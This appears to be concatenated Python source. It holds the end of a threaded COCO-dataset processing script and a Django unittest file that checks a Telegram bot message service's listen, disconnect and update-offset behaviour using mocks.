batchProject.loadPermuteGroups(threadGlobalState)
global COCO_flag
COCO_flag = args.COCO_flag
if COCO_flag:
dataDir = args.COCO_Dir
global coco
annFile='%s/annotations/instances_%s.json'%(dataDir,dataType)
coco = COCO(annFile)
global imgIds
imgIds = coco.getImgIds()
if args.graph is not None:
batchProject.dump(threadGlobalState)
threads_count = args.threads if args.threads else 1
threads = []
name = 1
for i in range(int(threads_count)):
name += 1
t = Thread(target=thread_worker,name=str(name))
threads.append(t)
t.start()
for thread in threads:
thread.join()
for k, fp in picklists_files.iteritems():
fp.close()
if __name__ == '__main__':
main()
|
test_service.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
from tests.factories import UpdateFactory
import threading
from django.conf import settings
settings.configure(
DEBUG=True,
USE_TZ=True,
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
},
ROOT_URLCONF="listenclosely.urls",
INSTALLED_APPS=[
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sites",
"listenclosely_telegram",
],
SITE_ID=1,
MIDDLEWARE_CLASSES=(),
LISTENCLOSELY_TELEGRAM_BOT_TOKEN="token",
)
try:
import django
setup = django.setup
except AttributeError:
pass
else:
setup()
try:
from unittest import mock
except ImportError:
import mock # noqa
class TestService(unittest.TestCase):
def setUp(self):
self.caller = mock.MagicMock()
from listenclosely_telegram.service import TelegramMessageServiceBackend
self.service = TelegramMessageServiceBackend(self.caller)
def _queue_thread(self, fn, *args, **kwargs):
while not self.service.bot.listening:
pass
if fn:
fn(*args, **kwargs)
def _listen(self, asyn_action, timeout=0.3):
self.input_thread = threading.Thread(target=self._queue_thread, args=(asyn_action,))
self.input_thread.daemon = True
self.input_thread.start()
self.service.listen()
self.assertFalse(self.service.bot.listening)
def _disconnect(self):
self.assertTrue(self.service.bot.listening)
self.service.disconnect()
def test_caller_assigned(self):
self.assertEqual(self.service.caller, self.caller)
def test_disconnect(self):
self.updates = [UpdateFactory()]
with mock.patch('twx.botapi.TelegramBot.get_updates', callable=mock.MagicMock()) as mock_get_updates:
mock_get_updates.return_value.wait = mock.MagicMock(return_value=self.updates)
self._listen(self._disconnect)
def test_offset(self):
self.updates = [UpdateFactory()]
with mock.patch('twx.botapi.TelegramBot.get_updates', callable=mock.MagicMock()) as mock_get_updates:
mock_get_updates.return_value.wait = mock.MagicMock(return_value=self.updates)
self._listen(self._disconnect)
self.assertEqual(self.service.bot.offset-1, self.updates[0].update_id)
if __name__ == '__main__':
import sys
sys.exit(unittest.main())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.